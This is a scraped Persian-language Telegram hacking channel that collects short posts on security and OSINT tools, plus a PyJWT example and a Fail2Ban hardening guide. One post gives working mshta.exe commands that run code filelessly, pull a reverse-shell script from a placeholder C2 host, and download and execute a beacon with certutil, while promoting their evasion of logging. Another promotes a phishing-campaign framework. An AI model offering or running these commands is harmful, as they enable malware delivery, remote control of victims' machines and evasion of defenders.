Hack 4҉҈ Man
8.96K subscribers
26 photos
1 video
33 links
@durov Этот пост ни в коем случае не аморален.
Этот канал является фан-каналом, и мы не публикуем какой-либо аморальный
#telegram_Rules
#Правила_телеграма
Download Telegram
👩‍💻 Hydra

🔺هیدرا ابزاری است که امکان انتخاب خودکار نام کاربری و رمز عبور را برای تعداد زیادی از سرویس‌های شبکه فراهم می‌کند. این ابزار از مجموعه‌ای گسترده از پروتکل‌ها پشتیبانی می‌کند، به طور انعطاف‌پذیری برای سناریوهای مختلف قابل تنظیم است و اغلب برای بررسی امنیت اطلاعات کاربری در محیط‌های آزمایشی استفاده می‌شود. علاوه بر این، هیدرا برای خودکارسازی حملات به سرویس‌هایی که از احراز هویت پایه استفاده می‌کنند، مناسب است.

⬅️ لینک گیت‌هاب
t.me/Hack4Man
6
This media is not supported in your browser
VIEW IN TELEGRAM
🔒 بلک‌بیرد (Blackbird)

👁 یک ابزار OSINT برای جستجوی ردپاهای دیجیتال بر اساس نام کاربری و آدرس ایمیل در شبکه‌های اجتماعی.

بلک‌بیرد، حساب‌ها را در بیش از 600 پلتفرم جستجو می‌کند، و با ترکیب بررسی در دسترس بودن پروفایل‌ها، فیلتر کردن نتایج و تحلیل خودکار، کارایی بالایی دارد. این ابزار از خروجی داده‌ها در قالب‌های PDF و CSV پشتیبانی می‌کند و همچنین از هوش مصنوعی برای پروفایل‌سازی اطلاعات یافت‌شده، مستقیماً از خط فرمان، استفاده می‌کند.

❗️ این ابزار برای متخصصان OSINT، محققان امنیت و تحلیلگران، برای خودکارسازی جمع‌آوری اطلاعات عمومی، بسیار مناسب است.

📱 گیت‌هاب (GitHub)

برچسب‌ها: #ابزارها #هک #امنیت

t.me/Hack4Man
2👍2
This media is not supported in your browser
VIEW IN TELEGRAM
🕷؛TGSpyder: ابزاری OSINT برای جمع‌آوری داده‌ها از تلگرام

یک ابزار خط فرمان (CLI) برای تحلیلگران، روزنامه‌نگاران و محققان. این ابزار، اعضا، پیام‌ها، لینک‌های دعوت و فراداده‌ها را از گروه‌ها/کانال‌های عمومی و خصوصی جمع‌آوری می‌کند. تمام اطلاعات به فرمت CSV خروجی داده می‌شوند تا تجزیه و تحلیل آن‌ها آسان‌تر باشد.

قابلیت‌ها:
جمع‌آوری لیست اعضا (در صورت امکان)
خروجی گرفتن از تاریخچه پیام‌ها
استخراج و حذف لینک‌های تکراری t.me
جستجوی کاربر بر اساس نام کاربری یا شناسه (ID)
تعیین سازنده بسته‌های استیکر بر اساس شناسه (ID) مجموعه استیکرها

نحوه نصب:
bash
git clone https://github.com/Darksight-Analytics/tgspyder.git
cd tgspyder
pip install -r requirements.txt
pip install -e .


نحوه استفاده اولیه:
bash
tgspyder https://t.me/examplegroup --members --chats
tgspyder --user @username
tgspyder --sticker-pack https://t.me/addstickers/packname

خروجی: تمام داده‌ها در پوشه‌ای به نام TGSpyder Output/ ذخیره می‌شوند و بر اساس پوشه‌ها و زمان‌بندی مرتب شده‌اند.

🔗 گیت‌هاب
t.me/Hack4Man
4
This media is not supported in your browser
VIEW IN TELEGRAM
🤖 ؛PentAGI: سیستم چندعاملی برای تست نفوذ خودکار

🔺این ابزار از عامل‌هایی مبتنی بر GPT، Claude یا DeepSeek برای انجام تست نفوذ استفاده می‌کند. این عامل‌ها با ابزارهای موجود در Kali Linux (بیش از 20 ابزار) کار می‌کنند، خود تصمیم‌گیری می‌کنند و وظایف را انجام می‌دهند.

قابلیت‌ها:
معماری چندعاملی: عوامل مختلف مسئولیت‌های مختلفی مانند جمع‌آوری اطلاعات، اسکن و بهره‌برداری را بر عهده دارند.
استفاده از ابزارهای Kali (مانند Nmap، Metasploit، Hydra و غیره) از طریق تصاویر Docker.
مدل‌های کنترلی: GPT، Claude، DeepSeek (قابل انتخاب).
رابط کاربری گرافیکی زیبا + مانیتورینگ از طریق Grafana/Prometheus.
امکان مشاهده فعالیت‌های عوامل به صورت زنده.

🔗 GitHub: PentAGI

t.me/Hack4Man
🔥32👍1
This media is not supported in your browser
VIEW IN TELEGRAM
💡ترفند: mshta - ایجاد یک شل معکوس از طریق برنامه HTML

🔺فکر می‌کنید mshta.exe فقط برای اجرای فایل‌های .hta استفاده می‌شود؟ خنده‌دار است، اما نه. این یک فایل اجرایی مخفی ویندوز است که می‌تواند جاوااسکریپت و VBScript را مستقیماً از حافظه اجرا کند. این فایل توسط مایکروسافت امضا شده است، به ندرت مسدود می‌شود و حتی زمانی که PowerShell غیرفعال است، کار می‌کند. بریم سراغش!

🔺؛mshta چه قابلیت‌هایی دارد (و چرا این موضوع عالی است)

1⃣ اجرای اسکریپت از حافظه بدون فایل روی دیسک
mshta.exe javascript:new ActiveXObject("WScript.Shell").Run("cmd.exe /c whoami",1,true);close()

این دستور cmd.exe را اجرا می‌کند و whoami را اجرا می‌کند. بدون ایجاد فایل، بدون ثبت رویداد در Event Viewer، مستقیماً از حافظه.

2⃣ ایجاد یک شل معکوس (بدون ذخیره روی دیسک)
mshta.exe javascript:new ActiveXObject("WScript.Shell").Run("powershell -c IEX(New-Object Net.WebClient).DownloadString('http://c2.com/rev.ps1')",0,true);close()

🔺این اسکریپت را از حافظه دانلود و اجرا می‌کند. PowerShell، اگر با -ExecutionPolicy Bypass اجرا شود، در تاریخچه ثبت نمی‌شود.

3⃣ دانلود بار مفید از یک سرور از راه دور
mshta.exe javascript:new ActiveXObject("WScript.Shell").Run("certutil -urlcache -split -f http://c2.com/beacon.exe beacon.exe && beacon.exe",0,true);close()

🔺ترکیب mshta و certutil به شما امکان می‌دهد یک فایل را بدون استفاده از PowerShell دانلود و اجرا کنید.

t.me/Hack4Man
5
This media is not supported in your browser
VIEW IN TELEGRAM
؛Phishing Frenzy — یک چارچوب برای حملات فیشینگ

🔺؛Phishing Frenzy یک ابزار قدرتمند و متن‌باز است که برای ایجاد و مدیریت کمپین‌های فیشینگ طراحی شده است.

🔺این ابزار، تمام عملکردهای لازم را برای خودکارسازی حملات فیشینگ در اختیار کاربران قرار می‌دهد، از جمله ایجاد وب‌سایت‌های جعلی، ارسال ایمیل‌های فیشینگ و ردیابی نتایج حملات.

📌لینک گیت هاپ
t.me/Hack4Man
This media is not supported in your browser
VIEW IN TELEGRAM
📦 کتابخانه روز: PyJWT — کار با توکن‌های وب JSON

؛JWT یک استاندارد برای انتقال امن داده‌ها بین طرفین است. PyJWT یک کتابخانه برای ایجاد و اعتبارسنجی این توکن‌ها است.

نصب:
pip install pyjwt

مثال: ایجاد و بررسی توکن:
import jwt
import datetime

SECRET_KEY = "your-secret-key"


# 1. ایجاد توکن
payload = {
    "user_id": 123,
    "username": "alex",
    "exp": datetime.datetime.now(datetime.UTC) + datetime.timedelta(hours=1)
}
token = jwt.encode(payload, SECRET_KEY, algorithm="HS256")
print(f"توکن: {token}")


# 2. بررسی توکن
try:
    decoded = jwt.decode(token, SECRET_KEY, algorithms=["HS256"])
    print(f"سلام، {decoded['username']}!")
except jwt.ExpiredSignatureError:
    print("توکن منقضی شده است")
except jwt.InvalidTokenError:
    print("توکن نامعتبر است")


t.me/Hack4Man
3
This media is not supported in your browser
VIEW IN TELEGRAM
📊یک ترمینال، مانیتورینگ مستقل را ارائه می‌دهد – نیازی به اجرای برنامه‌هایی مانند htop، iotop، nethogs و df نیست.

🛡یک رابط کاربری مبتنی بر متن (TUI) برای مانیتورینگ سیستم، نوشته شده با زبان Rust: دارای 6 تب با نمودارها برای CPU (هر هسته به صورت جداگانه)، حافظه، دیسک‌ها، شبکه، دما و باتری؛ قابل اجرا در سیستم‌عامل‌های Linux، macOS و Windows.

🔺تب Processes: نمایش ساختار درختی فرآیندها با قابلیت فیلتر و مرتب‌سازی بر اساس هر پارامتر + امکان خاتمه دادن به فرآیندها مستقیماً از طریق رابط کاربری.

🔺تب Disk: نمودارهای تعاملی از میزان استفاده دیسک‌ها با قابلیت نمایش تاریخچه.

🔺تب Network: نمودارهای سرعت شبکه در لحظه با قابلیت بزرگ‌نمایی زمانی.

📥 لینک به گیتهاپ

📌قابلیت سفارشی‌سازی در سطح تم‌ها، ویجت‌ها و فرکانس به‌روزرسانی. از ماوس پشتیبانی می‌شود.
t.me/Hack4Man
2
This media is not supported in your browser
VIEW IN TELEGRAM
🛡؛PatchMon: مدیریت متمرکز به‌روزرسانی‌ها در محیط‌های سرور

🔺این ابزار برای مدیران سیستم و تیم‌های امنیتی طراحی شده است و امکان مدیریت ایمن و متمرکز به‌روزرسانی‌ها را در سرورهای مختلف فراهم می‌کند. عوامل (agents) فقط از طریق کانال‌های خروجی با سرور PatchMon ارتباط برقرار می‌کنند، بنابراین نیازی به باز کردن پورت‌ها و مواجهه با خطرات امنیتی نیست.

قابلیت‌ها:
مدیریت متمرکز پچ‌ها در تعداد زیادی سرور

عوامل از طریق اتصالات خروجی کار می‌کنند (بدون نیاز به پورت‌های باز)

نمایش کامل وضعیت به‌روزرسانی‌ها

خودکارسازی ایمن فرآیندها


🔗 GitHub: PatchMon/PatchMon

t.me/Hack4Man
3
This media is not supported in your browser
VIEW IN TELEGRAM
WhatsApp-OSINT

این ابزار، عکس‌های پروفایل واتساپ را دریافت می‌کند، حساب‌های تجاری را بررسی می‌کند، وضعیت کاربران را تعیین می‌کند و دستگاه‌های مرتبط را از طریق رابط OSINT شرکت RapidAPI تجزیه و تحلیل می‌کند.

📁 زبان: پایتون

⭐️ تعداد ستاره‌ها: 973

⬅️ لینک گیت‌هاب
t.me/Hack4Man
3
This media is not supported in your browser
VIEW IN TELEGRAM
🛡 پیکربندی Fail2Ban در لینوکس: محافظت از سرور در برابر حملات brute-force در 5 دقیقه

؛Fail2Ban، لاگ‌های سرویس‌های سیستم را تحلیل می‌کند، فعالیت‌های مشکوک را شناسایی کرده و به طور خودکار آدرس‌های IP مهاجمان را مسدود می‌کند.

پیکربندی سریع:
# ایجاد فایل پیکربندی محلی

sudo cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local

# ویرایش قوانین
sudo nano /etc/fail2ban/jail.local

پارامترهای پایه (در ابتدای فایل):
bantime = 10m       # مدت زمان مسدودسازی
findtime = 10m       # بازه زمانی تحلیل
maxretry = 5         # تعداد تلاش‌ها قبل از مسدودسازی

پیکربندی برای SSH:
[sshd]
enabled = true
port = ssh
logpath = /var/log/auth.log
maxretry = 5

اجرا و مدیریت:
# شروع و فعال‌سازی خودکار

sudo systemctl start fail2ban
sudo systemctl enable fail2ban

# بررسی وضعیت
sudo systemctl status fail2ban


# مشاهده آدرس‌های IP مسدود شده
sudo fail2ban-client status sshd


t.me/Hack4Man
7